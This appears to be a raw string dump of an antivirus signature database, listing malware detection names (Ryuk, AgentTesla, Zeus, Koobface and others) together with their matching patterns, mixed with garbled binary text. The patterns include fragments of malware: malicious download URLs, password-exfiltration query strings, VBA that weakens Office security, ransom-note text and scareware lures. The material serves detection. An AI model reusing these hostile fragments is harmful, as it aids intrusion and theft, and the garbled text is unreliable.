Gamer_Clock.My.Resources Stelega.DG!MTB $818d92f8-ca83-4992-99c7-efc78e65f909 PixelSorter.Properties.Resources cookie_list.txt outlook.txt passwords.txt history_Mozilla Firefox history_Mozilla Firefox] TrojanDownloader:O97M/EncDoc.PVAK!MTB %TrojanDownloader:O97M/EncDoc.PVAK!MTB TrojanDownloader:O97M/EncDoc.DOFT!MTB %TrojanDownloader:O97M/EncDoc.DOFT!MTB Behavior:Linux/SuspiciousHijackLinkerPaths.A .,Behavior:Linux/SuspiciousHijackLinkerPaths.A /usr/bin/python /bin/yum /bin/dnf @ /etc/ld.so.conf Behavior:Linux/SuspiciousHijackLinkerPaths.B .,Behavior:Linux/SuspiciousHijackLinkerPaths.B Chopper.B!dha AgentTesla.OXCK!MTB AgentTesla.OXCL!MTB Behavior:MSIL/SnakeKeylogger.A!MTB .\"Behavior:MSIL/SnakeKeylogger.A!MTB SnakeKeylogger.MK!sms 4\"SxY 4\"SxY{] Behavior:Linux/HiddenCronJob.A Behavior:Linux/HiddenCronJob.B AObfuse.NX!MTB Backdoor:Win64/CobaltStrikeLoader.H!dha 'Backdoor:Win64/CobaltStrikeLoader.H!dha Exploit:O97M/CVE-2017-0199.RVQ!MTB \"Exploit:O97M/CVE-2017-0199.RVQ!MTB target=\"http://raggina.space/bc855646d052/spool/boot/acxbbz.dot\"targetmode=\"external\" Wtarget=\"http://raggina.space/bc855646d052/spool/boot/acxbbz.dot\"targetmode=\"external\" target=\"http://zxtenrnewlaunchinworldwide.mangospot.net/.-...........................................................................................................-/s.dot\"targetmode=\"external\" Behavior:Win32/SuspExchgSession.E .!Behavior:Win32/SuspExchgSession.E \\microsoft\\exchange server\\v \\frontend\\ \\clientaccess\\ \\frontend\\httpproxy\\owa\\ \\inetpub\\wwwroot\\ Backdoor:Win64/CobaltStrike.V!dha !Backdoor:Win64/CobaltStrike.V!dha Trojan:HTML/Phish.GRV!MTB AObfuse.NW!MTB TrojanDownloader:O97M/IcedID.RVQ!MTB $TrojanDownloader:O97M/IcedID.RVQ!MTB CreateObject(\"wscript.shell\").RegWrite listConst, 1, \"REG_DWORD\" length = Len( ) For i = 0 To length - 1 reversedText & Mid( , (length - i), 1) = GetObject(\"\", \"word.application\") = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" & Application.Version & \"\\Word\\Security\\AccessVBOM\" .Quit SaveChanges:=wdDoNotSaveChanges valueEx(countTitle, 8 / 4, 1500000) ActiveDocument.Range.Text TrojanDownloader:O97M/IcedID.RVR!MTB $TrojanDownloader:O97M/IcedID.RVR!MTB Behavior:Win32/EngSystemTokenElevated.A .'Behavior:Win32/EngSystemTokenElevated.A Behavior:Win32/ChromeChildElevated.A!dha .(Behavior:Win32/ChromeChildElevated.A!dha Low:UI+RemediateProcess+Telemetry+ProcessMetaStore+MonitorProcTreeEop+ParentInfo 33QLow:UI+RemediateProcess+Telemetry+ProcessMetaStore+MonitorProcTreeEop+ParentInfo Behavior:Win32/MZPEMemoryArtifacts.E .$Behavior:Win32/MZPEMemoryArtifacts.E !DelfInject.PNM!MTB Backdoor:Win64/Sntukore.A!dha Trojan:AndroidOS/Talklog.A!MTB Behavior:Win32/RyukCreateScheduledTask.C .(Behavior:Win32/RyukCreateScheduledTask.C Behavior:Win32/RyukCreateScheduledTask.D .(Behavior:Win32/RyukCreateScheduledTask.D Low:Telemetry+FileMetaStore+ProcessMetaStore+FullThreadScan+MonitorProcTreeEop+EmsScan+ParentInfo 33bLow:Telemetry+FileMetaStore+ProcessMetaStore+FullThreadScan+MonitorProcTreeEop+EmsScan+ParentInfo Behavior:Win32/Ryuk.X mransom:win32/ryukschtasks.zz Behavior:Win32/Ryuk.ZZ Behavior:Win32/Ryuk.ZY Behavior:Win32/Ryuk.ZX Behavior:Win32/Ryuk.ZW Ransom:Win32/Ryuk.ZZ!sms Ransom:Win32/Ryuk.A!!Ryuk.A Ransom:Win32/Ryuk.B!!Ryuk.B Ransom:Win32/Ryuk.C!!Ryuk.C Ransom:Win32/Ryuk.D!!Ryuk.D Backdoor:Win64/Sntukore.B!dha Backdoor:Win64/Sntukore.C!dha Backdoor:Win64/Sntukore.D!dha Backdoor:Win64/Sntukore.E!dha Backdoor:Win64/Sntukore.F!dha Backdoor:Win64/Sntukore.G!dha TrojanDownloader:O97M/Tnega!MSR Backdoor:Win64/Sntukore.H!dha Backdoor:Win64/Sntukore.I!dha Backdoor:Win64/Sntukore.J!dha Gafgyt.E keksec.was.here you have been infected by knownBots /x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A TrojanDownloader:O97M/EncDoc.IDIE!MTB %TrojanDownloader:O97M/EncDoc.IDIE!MTB Ransom:MSIL/Cryptolocker.DN!MTB SAYGOODBYE.exe2 ShellLocker2 ___RECOVER__FILES__.heart.txt YOUR FILES HAVE BEEN ENCRYPTED .kanmani \\Heartbeat\\keys.json EncryptFiles encryptFile Encrypted Files Count: Black Cat crypt15 BTC address: BTC address:] !Glupteba.PO!MTB 8<7{jF !Dridex.OR!MTB TrojanDropper:O97M/Hancitor.KAI!MTB %#TrojanDropper:O97M/Hancitor.KAI!MTB TrojanDropper:O97M/Hancitor.KAJ!MTB %#TrojanDropper:O97M/Hancitor.KAJ!MTB TrojanDownloader:O97M/EncDoc.AJSR!MTB %TrojanDownloader:O97M/EncDoc.AJSR!MTB AgentTesla.OXCN!MTB TrojanDownloader:O97M/EncDoc.PVAM!MTB %TrojanDownloader:O97M/EncDoc.PVAM!MTB AChopper!dha TrojanDownloader:O97M/Gozi.ANNS!MTB #TrojanDownloader:O97M/Gozi.ANNS!MTB = \"explorer c:\\users\\public\\ %.hta\" .exec tg = Split(frm.tg, \" \") <html><body><div id='content'>fTtl = CreateObject(\"wscript.shell\") = CreateObject(\"wscript.shell\")] AgentTesla.OG!MTB FileZillaProject.frmMain.resources FileZillaProject.frmDeckViewer.resources veluwevakantie Timer0 GetType] !Azorult.NP!MTB AgentTesla.OXCO!MTB TrojanDownloader:O97M/Gozi.ANTL!MTB #TrojanDownloader:O97M/Gozi.ANTL!MTB Ransom:PowerShell/BeBack SCPT:Ransom:PowerShell/BeBack1&SCPT:Ransom:PowerShell/BeBack2&SCPT:Ransom:PowerShell/BeBack3&SCPT:Ransom:PowerShell/BeBack4] {SCPT:Ransom:PowerShell/BeBack1&SCPT:Ransom:PowerShell/BeBack2&SCPT:Ransom:PowerShell/BeBack3&SCPT:Ransom:PowerShell/BeBack4] TrojanDownloader:O97M/EncDoc.VIOK!MTB %TrojanDownloader:O97M/EncDoc.VIOK!MTB !Obfuse.HBS!MTB !Obfuse.HBT!MTB Trojan:HTML/Phish.HRV!MTB Exploit:O97M/CVE-2017-11882.HKZ!MTB #Exploit:O97M/CVE-2017-11882.HKZ!MTB Trojan:HTML/Phish.RCV!MTB AgentTesla.PT!MTB Pa1~g Behavior:Win32/ContiNote.A Behavior:Win32/ContiNote.B AgentTesla.PV!MTB b/9ul 6ai#ly ):_g >v00Y >v00Y: AgentTesla.PW!MTB &#wL\t nS}Zu [z~F/ eyboardHookDelegate antiSandboxie \\Kreylogger Source\\gmail Keylogger\\My Keylogger\\ \\Kreylogger Source\\gmail Keylogger\\My Keylogger\\] !Vbinder.BT !Vasilba.A !Nedsym.F Responce Blank /stat2.php \\system32\\qtplugin.exe ¯oses_version= &deliveredpercent= GLOBAL_RANDOMIZED_BODY Control Thread....No Jobs Loaded, Sleeping 300 seconds.... Calculating Delivered Percent.... !Bamital.F aRootkitdrv.OC !Phexy.A !Twores.L SizeofResource] !Wimpixo.B !Pidief.AU !Delf.VB !Hepae.A !VB.WT !Delf.EB !Iroffer !Bancos.TB !Genome.H !VB.JX D:\\\\.+\\\\.+fcx\\\\.+1.vbp !Poison.AO !Goodwin.A dimvbssdimdvbsvbss=\"po!fssps!sftvnf!ofyupo!fssps!sftvnf!ofyuejn!dpef-xjo-ejtl-ttu Sdimvbssdimdvbsvbss=\"po!fssps!sftvnf!ofyupo!fssps!sftvnf!ofyuejn!dpef-xjo-ejtl-ttu !CeeInject.gen!BG !Rimecud.DN !Hacopa.A !Banload.MT !VBInject.EF 4D5A900 !OnLineGames.ZFK %s?action=postmb&u=%s&mb=%s %s?action=postmb&u=%s&mb=%s] !OnLineGames.GZ )HlMain.dll MyDllRun XieZaiDLL )HlMain.dllMyDllRunServiceMainXieZaiDLL www.xiaohua.kr:8001 NetBot Attacker NetBot Attackera SYSTEM32\\hf0021.dll sethooke = %08x SetHook sethooke = %08xSetHook <%s%s?dfu=%s&dfp=%s&dfp2=%s&dfn=%s SELECT SERVER .\\DNF.cfg <%s%s?dfu=%s&dfp=%s&dfp2=%s&dfn=%sSELECT SERVER.\\DNF.cfg loginname=df &strPassword= loginname=df&strPassword= !Pdfjsc.EN !Bancos.TC !Besto.A \" f 7 Ransom:Win32/Genasom.AB !Lolyda.AY mibao.php?action=put&u=%s ?s=%s&u=%s& !VBInject.gen!DE !VBInject.gen!DF !Banker.PW -;>0] !VB.WU .Pot_Drone By Pot_Knight !VBInject.EG #.txt __vbaLateMemCall VBA6.DLL WhiteCoatVBA6.DLL] ARedirector.CN !Pdfjsc.EO !Bancos.TD !Bancos.DF !AolxyBot.A !VB.WO 6X\\d-l !Pdfjsc.EP Nimeaas.A !Nosrawec.A t>jhA !Rimecud.DO !VBInject.EH !VBInject.EI !VBInject.EJ !VBInject.EK 2Crypt3r\\demonio666vip.vbp clsTwofish EncryptByte \"Indetectables.net] !VBInject.EL !Zbot.SD !Rimecud.DP !Rimecud.DQ !DelfInject.K !Bancopac \\+http://ns1.natalnosso.info:8082/windows.pac 'user_pref(\"network.proxy.autoconfig_url 'user_pref(\"network.proxy.autoconfig_url] !MultiDropper.AO n\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects .regsvr32 /s shdocwv.dll Brasil] HatiHati.A aI[=b !VB.CI !Pdfjsc.EQ %pdf-1.010obj<</type/catalog/pages20r/names30r>>endobj20obj<</type/pages/count1/kids[40r]>>endobj30obj<</javascript50r>>endobj40obj<</type/page/parent20r/contents120r>>endobj50obj<</names[(1)60r(2)70r(3)80r]>>endobj60obj<</js r/s/javascript>>endobj70obj<</js r/s/javascript>>endobj80obj<</js r/s/javascript>>endobj obj<</filter/flatedecode/length !Delf.BT ---/$$/POST_URL= ---/$$/POST_URL=] !Gael.A Q3@$c[ !OnLineGames.HB E:\\\\.+\\\\2010\\\\baidu.vbp !Delf.IY http://www.bobozim.hpg.com.br/nohot.jpg avatar.jpg satplg.jpg satplg.jpg] !Delf.IZ !Bancos.TE !Delf.JA !Autorun.QF!inf !Nuqel.AT!inf ADursg.D !VBInject.EM !Rimecud.DR !Rimecud.A ~M[>v !Ghodow.A 5t\tAB unionid=%s&mac=%s&iever=%d&alexa=%d&systemver=%d&antisoftware=%s&pluginver=%s /count.aspx?i= %s/NewConfig.aspx?m= SOFTWARE\\Classes\\CLSID\\{3CEFF6CD-6F08-4e4d-BCCD-FF7415288C3B} SOFTWARE\\Microsoft\\Internet Explorer\\Version Vector QQSelf%d.exe !Autorun.WQ ADursg.E ADursg.F !Dursg.E &se.php?pop=1&aid=%s $request.php?aid=%s !Omexo.C SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command ASOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command \\\\?\\globalroot\\systemroot\\system32\\drivers\\etc\\hosts 4\\\\?\\globalroot\\systemroot\\system32\\drivers\\etc\\hosts \\\\.\\PhysicalDrive%d Software\\Microsoft\\Internet Explorer\\TypedURLs .Software\\Microsoft\\Internet Explorer\\TypedURLs :Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2 PK11_CheckUserPassword cookiesie.z cookies.z \tcookies.z keylog.z certs.z sysinfo.z \tsysinfo.z iexplore.exe|opera.exe|firefox.exe \"iexplore.exe|opera.exe|firefox.exe src='http://%s/jbinfo.cgi?%s:%d'> !src='http://%s/jbinfo.cgi?%s:%d'> Global\\{721E3A61-883B-4144-BA81-1F965879E5C9} -Global\\{721E3A61-883B-4144-BA81-1F965879E5C9} AUTHINFO PASS stealit pass_log sniff_log \tsniff_log] !VBInject.gen!DT !ShellCode.W <scriptlanguage=\"javascript\"> ?<scriptlanguage=\"javascript\"> heapspraytoaddress payload= !Prolaco.N !Namsys.A aClassloader.S aClassloader.T aClassloader.U 6ZSgowx@ aClassloader.V aClassloader.W aClassloader.X aClassloader.Y aClassloader.Z aClassloader.AA Trojan:HTML/Redirector.O <appletcode=\" {<appletcode=\" .appletx.class\"archive=\" #.jar\" @><paramname=\"data\"value=\" D\"><paramname=\" 12\"></applet> !Pidief.gen!B !Swisyn.E wmagents.exe passes.xm /gt.php *internet explorer* keylog.txt paslist.txt paslist.txt] !VBInject.EN !VBInject.EO !Pdfjsc.ER aCutwail.A !Cutwail.AW \\System32\\svchost.exe MaxUserPort 2SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters &proxy1.ru:8080;proxy1.ru:80;proxy3.ru; &proxy1.ru:8080;proxy1.ru:80;proxy3.ru;] xNThist !Pdfjsc.ES !Pdfjsc.ET !Pdfjsc.EU !Pdfjsc.EV !Pdfjsc.EW >4< ] !Shark.B !VB.WP C:\\\\.*A.*\\\\B\\\\Base.vbp AQakbot.B 1Fopper !Pdfjsc.EX AMult.CR !Rimecud.DS !CeeInject.gen!BH dbghelp.dll SbieDll.dll dbghelp.dllSbieDll.dll !Rimecud.DT G>D9] !VBInject.EP !VBInject.gen!DU !Dofriv.A !Rimecud.DU Ghodow.A !Ghodow.B \\\\.\\Physicaldrive0 unionid=%s&mac=%s&iever=1&alexa=0&systemver=2&antisoftware=0&pluginver=%s %s/count.aspx?i= %s/count.aspx?i=] !Zbot.gen!Y !Zbot.gen!YO@ C:\\Users\\ZEUS\\Desktop\\Zeus Source Code 2\\source\\client\\ 7C:\\Users\\ZEUS\\Desktop\\Zeus Source Code 2\\source\\client\\~ 2.@}# W(X_$ 5Swisyn.E drivers.log [Del] {Sil} {Arrow_Up} {Arrow_Up}] !#PEPCODE:Trojan:Win32/Skintrim!attr1 SizeOfInitializedData 137783c66195c HSTR:VirTool:Win32/Obfuscator.PN!k7.A0 'HSTR:VirTool:Win32/Obfuscator.PN!k7.A0 HSTR:VirTool:Win32/Obfuscator.PN!upk.1 'HSTR:VirTool:Win32/Obfuscator.PN!upk.1 HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4242 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4242 #HSTR:VirTool:Win32/Obfuscator.PN.4 HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4343 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4343 HSTR:VirTool:Win32/Obfuscator.PN!k7.1E 'HSTR:VirTool:Win32/Obfuscator.PN!k7.1E HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4444 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4444 HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4545 .HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_4545 !#SLF:Lua:ContextualGamDll4 ^{?[%w%p]+}?%.{%w%w%w%w%w%w%w%w%-%w%w%w%w%-%w%w%w%w%-%w%w%w%w%-%w%w%w%w%w%w%w%w%w%w%w%w}$ Z^{?[%w%p]+}?%.{%w%w%w%w%w%w%w%w%-%w%w%w%w%-%w%w%w%w%-%w%w%w%w%-%w%w%w%w%w%w%w%w%w%w%w%w}$ ^%p%p%p+%.%d$ FileDescriptionWindows serwvdrv Library InternalNameserwvdrv OriginalFilenameserwvdrvj% $ .text' `.rsrc8 \"@@.reloc* RSDSKKg jsproxy.pdb jsproxy.pdbh, Cmm:^ 9zd;]J K-AVj n#'dQ l#&MD +\tY|U 67#JU _Ek\"s @dn9B/ pba6q v]|i\\ Kzs=v( F0.T) oft\tD$h'C$ IDTXq G?(t|o c0gZA d7Wt9 9NRRay& vjFnBW 8cIBE h629& hi`O}C -=\"m` S\\;pn( h,PD2 N`w+0 ioeGql ?ecvt xYA* OI=t>0 ECX_]@ <hP Sz |DX z Jt>/Gt rZTxj e`#1l N}d$O 2i<V7 2=>-p Ne)?X e!O\tS) qF ZP kJ\\7C xx<u[p cator.Capslock.stream.A .sTreAm \t.sTreAm .sTreaM \t.sTreaM .sTream \t.sTream .stREAM \t.stREAM .stREAm \t.stREAm .stREaM \t.stREaM .stREam \t.stREam .stReAM \t.stReAM .stReAm \t.stReAm .stReaM \t.stReaM .stReam \t.stReam .strEAM \t.strEAM .strEAm \t.strEAm .strEaM \t.strEaM .strEam \t.strEam .streAM \t.streAM .streAm \t.streAm .streaM \t.streaM :&!#SCPT:JS/Obfuscator.Split.WriteLine.A 'riteLi \t'riteLi iteLi'; \titeLi'; teLin'; \tteLin'; '!#SCPT:JS/Obfuscator.Capslock.Appdata.A :'!#SCPT:JS/Obfuscator.Capslock.Appdata.A PDATa% PDAtA% PDAta% PDaTA% PDaTa% PDatA% PData% PdATA% PdATa% PdAtA% PdAta% PdaTA% PdaTa% PdatA% pDATA% (!#SCPT:JS/Obfuscator.functions.asindex.D :(!#SCPT:JS/Obfuscator.functions.asindex.D ]](); !#SCPT:s_codescript.B =new Function(\" !#SCPT:JS/BinaryDataToFile.A .BinaryDataToFile( \",'WS' `,'cri \",'WSc' `,'ri \"WScr\"+\"i 22ADOD 22EMP 25TEM flash. em.Security !#SCPT:JS/Obfuscator.Hex.var.A \\x76\\x61\\x72\\x20 \".concat(\"val\"); echo PowerShell \"\\x63\\x68ar \"\\x63h\\x61r \"\\x63ha\\x72 \"c\\x68\\x61r \"c\\x68a\\x72 \"ch\\x61\\x72 !#SCPT:JS/Obfuscator.HexMixed.J %5B%22Run%22%5D 105,120,112,109 107,122,114,111 216,201,193,220 255,233,226,232 !#Lowfi:SCPT:Java/AllatoryDemo.A ; !#Lowfi:SCPT:Java/AllatoryDemo.A ALLATORI_DEMO !#SCPT:Extrac32RelativePathAbuse ; !#SCPT:Extrac32RelativePathAbuse !#SCPT:JS/HexString.Assignment.B ; !#SCPT:JS/HexString.Assignment.B ;!!#SCPT:JS/Obfuscator.Redundancy.A []).charAt(!+ ;!!#SCPT:JS/Obfuscator.Redundancy.B =this['' + (' !!#SCPT:JS/Obfuscator.Redundancy.M ;!!#SCPT:JS/Obfuscator.Redundancy.M & 0 * * 0 & * 0 * * 0 + * 0 - * 0 / * 0 ^ * 0 | + 0 * - 0 * / 0 * ^ 0 * | 0 * !!#SCPT:JS/Obfuscator.Redundancy.T ;!!#SCPT:JS/Obfuscator.Redundancy.T + (0); + (1); + (2); + (3); ;\"!#SCRIPT:Java/AdwindOddClassName.D /RunPE.class \"!#SCRIPT:SpcIndirectDataContentOid ;\"!#SCRIPT:SpcIndirectDataContentOid #!#SCPT:JS/Obfuscator.BASE64.close.A ;#!#SCPT:JS/Obfuscator.BASE64.close.A \"Y2xvc2U=\". ;$!#SCPT:JS/Obfuscator.Split.ComSpec.A + 'OMSPEC% = '%COMS'; = 'OMSPEC% ='%COMSP'; ;$!#SCPT:JS/Obfuscator.Split.getYear.A getYea\"+\"r ;$!#SCPT:JS/Obfuscator.Split.replace.A r\"+\"eplace re\"+\"place rep\"+\"lace repl\"+\"ace repla\"+\"ce replac\"+\"e $!#SCPT:JS/Obfuscator.Split.reverse.A ;$!#SCPT:JS/Obfuscator.Split.reverse.A r\"+\"everse re\"+\"verse rev\"+\"erse reve\"+\"rse rever\"+\"se revers\"+\"e &!#SCPT:JS/Obfuscator.Enc.Subbyte.com.A ;&!#SCPT:JS/Obfuscator.Enc.Subbyte.com.A CEEHETER CFEIEUES CGEJEVET CHEKEWEU CIELEXEV CJEMEYEW CKENFAEX CLEOFBEY CMEPFCFA CNEQFDFB COERFEFC CPESFFFD CQETFGFE CREUFHFF CSEVFIFG CTEWFJFH CUEXFKFI CVEYFLFJ CWFAFMFK CXFBFNFL CYFCFOFM DAFDFPFN DBFEFQFO DCFFFRFP DDFGFSFQ DEFHFTFR DFFIFUFS DGFJFVFT DHFKFWFU DIFLFXFV &!#SCPT:JS/Obfuscator.Enc.Subbyte.exe.A ;&!#SCPT:JS/Obfuscator.Enc.Subbyte.exe.A FMHRILHR FNHSIMHS FOHTINHT FPHUIOHU FQHVIPHV FRHWIQHW FSHXIRHX FTHYISHY FUIAITIA FVIBIUIB FWICIVIC FXIDIWID FYIEIXIE GAIFIYIF GBIGJAIG GCIHJBIH GDIIJCII GEIJJDIJ GFIKJEIK GGILJFIL GHIMJGIM GIINJHIN GJIOJIIO GKIPJJIP GLIQJKIQ GMIRJLIR GNISJMIS GOITJNIT GPIUJOIU GQIVJPIV GRIWJQIW GSIXJRIX &!#SCPT:JS/Obfuscator.HexMixed.return.A ;&!#SCPT:JS/Obfuscator.HexMixed.return.A \\x72etur r\\x65tur re\\x74ur ret\\x75r &!#SCPT:JS/Obfuscator.OctMixed.return.A ;&!#SCPT:JS/Obfuscator.OctMixed.return.A \\162etur r\\145tur re\\164ur ret\\165r '!#SCPT:JS/Obfuscator.Capslock.WScript.A ;'!#SCPT:JS/Obfuscator.Capslock.WScript.A t.SHELl \tt.SHELl t.SHElL \tt.SHElL t.SHEll \tt.SHEll t.SHeLL \tt.SHeLL t.SHeLl \tt.SHeLl t.SHelL \tt.SHelL t.SHell \tt.SHell t.ShELL \tt.ShELL t.ShELl \tt.ShELl t.ShElL \tt.ShElL t.ShEll \tt.ShEll t.SheLL \tt.SheLL t.SheLl \tt.SheLl t.ShelL \tt.ShelL t.sheLL \tt.sheLL ;(!#SCPT:JS/Obfuscator.BASE64EncScript.001 ('dmFy (!#SCPT:JS/Obfuscator.Redundancy.Spaces.B ;(!#SCPT:JS/Obfuscator.Redundancy.Spaces.B 1) ; 2) ; 3) ; 4) ; 5) ; 6) ; 7) ; 8) ; 9) ; (!#SCPT:JS/Obfuscator.functions.asindex.B ;(!#SCPT:JS/Obfuscator.functions.asindex.B ()](); ;(!#SCPT:JS/Obfuscator.functions.asindex.D ])](); !#SCPT:BelmontHB ERROR: Cannot set windows hook. !ERROR: Cannot set windows hook. 22WScr 22ADODB = 'h' + 'ttp:/ = 'ht' + 'tp:/ = 'htt' + 'p:/ = 'http' + adByt addCh tList !#SCPT:SWF/Obfuscator.Split.Q entLis ['\\u006F\\u0070en ['\\u006Fp\\u0065n ['\\u006Fpe\\u006E ['o\\u0070\\u0065n ['o\\u0070e\\u006E ['\\u0073\\u0065nd ['\\u0073e\\u006Ed ['\\u0073en\\u0064 ['s\\u0065\\u006Ed ['s\\u0065n\\u0064 ['se\\u006E\\u0064 , \"WScri\\x69\\x70 , \"WScri\\x70\\x74 , \"W\\u0053\\u0063 , \"W\\x53\\x63\\x72 , \"\\u0057S\\u0063 , \"\\u0057\\u0053c [(\"W\\u0053\\u0063 [(\"\\u0057S\\u0063 [(\"\\u0057\\u0053c \"c\"+\"\\x68\"+\"arAt \"c\\x68\\x61rA \"c\\x68a\\x72A \"c\\x68ar\\x41 \"ch\"+\"\\x61\"+\"rAt \"ch\\x61\\x72A \"ch\\x61r\\x41 \"cha\"+\"\\x72\"+\"At \"cha\\x72\\x41 \"char\"+\"\\x41\"+\"t !#Exploit:Win32/CVE-2015-0097.A2 < !#Exploit:Win32/CVE-2015-0097.A2 ADODB.Recordset !#SCPT:JS/HexString.Assignment.A < !#SCPT:JS/HexString.Assignment.A = '\\x !#SCPT:JS/Obfuscator.Split.php.A < !#SCPT:JS/Obfuscator.Split.php.A '.'+'p'+'h'+'p' < !#SCPT:VirTool:SWF/Obfuscator.K0 IlllIl1 11I1l !#TrojanDownloader:VBS/Vibrio.P3 < !#TrojanDownloader:VBS/Vibrio.P3 |llehs.tpircsW| <!!#SCPT:JS/Obfuscator.Redundancy.N switch (false) <$!#SCPT:JS/Obfuscator.Split.ComSpec.A = '%COMSP'; = 'EC% <$!#SCPT:VBS/Obfuscator.bin.base64.001 .ba\",\"se64\" <%!#//SCPT:JS/Obfuscator.HexMixed.var.A \\x76\\x61r \\x76a\\x72 \\x76ar\\x20 v\\x61r\\x20 =kiri1;window.onbeforeunload=asdf;if(navigator.useragent.indexof(\"f +\"x\")!=-1){alert(qw id('text2') /g,''); @if(navigator.useragent.indexof(\"firefox\")!=-1){alert( window.resizeto(0 );window.moveto(width1 ,height1 +-123456789); result_text=l22.replace(/lol_lol/g,'')+l33.replace(/lol_lol/g,'');functionbirka(){returnaskerr==1?result_text:false;}window.onbeforeunload=birka;functionlopiufd(){alert(result_text);}lopiufd();functionpromkastofuck(){varelemname=\"iframe\";elemname+=\"\";vars=document.createelement(elemname);s.src=\"?c= se{}var +'r';var +'m';var +'k';var +'.';var +'l';var +'.';return !Koobface.gen!O ?action=bitly ?action=bitly] !Koobface.gen!P ?action=plgen ?action=plgen] !Agent.AAG aaaaaaaaaaaaaaaaaaaaaa.limewebs.com/z/gate.php .aaaaaaaaaaaaaaaaaaaaaa.limewebs.com/z/gate.php !Small.QP !Karagany.A h|brxwkjs* enbpuoatp<m`>rq z}?iuo{u?bf |w!s~ !Koobface.E MonitoringTool:Win32/ShadowKeylogger $MonitoringTool:Win32/ShadowKeylogger \\Password for stopping the keylogging proccess. 6Enable Screenshot Capturing Shadow_Keylogger.Resources Shadow_Keylogger.Resources] !Bagle.ACE !Ldpinch.UU !Koobface.Q !Koobface.gen!G %s?action=ppgen&a=%d&v=%s&pid=%s&cnt=%d %s?action=md5gen&url=%s&reqhash=%s&reshash=%s&v=01 %s?v=1&action=passgen&l=%s&p=%s %s?action=banurlgen&v=%s&ban_url=%s %s\\zpskon_%d.exe feedwall_with_composer /roadblock/] !Pushbot.TT !Neeris.BE !Alureon.E ExecPri.dll ExecWait ExecPri.dllhighExecWait inetc.dll inetc.dll/end /crl.exe /isass.exe /sdd32.exe /sdm64.exe /fpss2.exe \\syskeya.exe \\wpnpinsta.exe \\presentationsettingsa.exe \\efsuib.exe \\bitsadminb.exe \\bitsadminb.exe] !Neeris.BF Rogue:BAT/FakePAV /every:m,t,w,th,f,s,sumshta.exehttp:// 6/every:m,t,w,th,f,s,sumshta.exehttp:// .php?olala= aSirefef.gen!C IDE\\[cmz vmkd] !Harnig.gen!E aAlureon.O !Koobface.AO Killav.V !Ldpinch.CV !Pushbot.TU !Mooplids.A GET tD POSTt< .dllG !Oficla.V Rogue:HTML/FakeRean id=closewebpage><ahref=\"http://127.0.0.1:27777/?inj=http:// =id=closewebpage><ahref=\"http://127.0.0.1:27777/?inj=http:// !FakeSysdef 0$0$! 0>c_1 wM0>0 .exe.tmp 06http:// ?type=stats&affid= &subid= &awok 0Jsoftware\\ windows\\ currentversion\\ policies\\ C:\\Documents and Settings\\All Users\\Application Data\\ 0>C:\\Documents and Settings\\All Users\\Application Data\\ 04http:// 0.org/404.php?type=stats&affid= 6hp@h ,HDDRepair module activ &Run Defragmentation activation code *for your purchase, %s PC is in danger &scan your hard drivg ?--}~ IU02# IU0S( IU0g^ p0vPd z|t,n QAQ/S .J9oOV g=<NN? g=<NN?` <NN?g rotef H83a5f83b-5aa7-4fa7-bbf5-63829add296e rootkit__ 3Uf3D$ stats&affid=%s&subid=%s&i hard drive error occurred Processing Message 0x0000013 Parametersx \\fcrypt\\Release\\S\\s_high.pdb :\\src\\ \\Release\\S\\ Nrecommended that you restart the system adw: terminate %lu ok @Install %s software (recomended) %s is professional software toolkit designed to detect, identify and fix hardware memory related problemsx avoid data loss it is highly recommended to run System Repair Wizard svchost.exe - Corrupt Disk %s%s/%s?p=%s&aid=%s&sid=%s&hash=%s&product=%s Checking S.M.A.R.T. attributes... physical resources of this disk have been exhausted. The device is unreachablex __exe_url__ __exe_download__ detected a problem with one or more installed IDE / SATA hard disks l.php?type=stats&affid=%s&subid=%s&version=%s&installok l[Your disk is in a critical state. Click here for more \"%s\\%s_License.txtx Exe file is corrupted and can't be run. Hard drive scan required VClick %tb[\"Allow\"] when UAC screen appears hDefragHDDRepair module activation required to enable %s performance issues found. Click %%tl[here] to start perfomance & stability optimization. readdatagateway.php?type=stats&affid=%s `DefragHDDRepair tool can fix detected hard drive Defragmenter Diagnostics Run Defragmentation Buy Now! readdatagateway.php?type= %s/%s/%s-direct.exe 8856F961-340A-11D0-A96B-00C04FD705A2 83a5f83b-5aa7-4fa7-bbf5-63829add296e 625773d0-1eb5-4879-8322-8bdc33d9d4fe 9cf2592c-1832-4358-a0fc-26d6a0c29808 d8bb5910-2d85-489b-8403-803ed25e73bc f7c5da73-b4a5-4947-8f40-08f2871eb36b searchfindfix.org searchmemory.org <?pid=%s&id=%s&subid=%s&guid=%s Hard drive clusters are partly damaged. Segment load failure RAM memory reliability is extremely low. This problem may cause system failure \"//%s/%s/%s-direct B.php?type=stats&affid=%s&subid=%s <Windows - Delayed Write Failed _exe_url__ _exe_download__~ L3(|5 UcI\t{2U A^R;c n7^Rp '\"=\t` ture:M:139 !#HSTR:JAVA:Feature:M:142 !#HSTR:JAVA:Feature:M:143 !#HSTR:JAVA:Feature:M:147 !#HSTR:JAVA:Feature:M:148 !#HSTR:JAVA:Feature:M:150 !#HSTR:JAVA:Feature:M:152 !#HSTR:JAVA:Feature:M:155 !#HSTR:JAVA:Feature:M:157 !#HSTR:JAVA:Feature:M:158 !#HSTR:JAVA:Feature:M:159 !#HSTR:JAVA:Feature:M:160 !#HSTR:JAVA:Feature:M:168 !#HSTR:JAVA:Feature:M:169 !#HSTR:JAVA:Feature:M:170 !#HSTR:JAVA:Feature:M:174 !#HSTR:JAVA:Feature:M:176 !#HSTR:JAVA:Feature:M:177 !#HSTR:JAVA:Feature:M:178 !#HSTR:JAVA:Feature:M:182 !#HSTR:JAVA:Feature:M:184 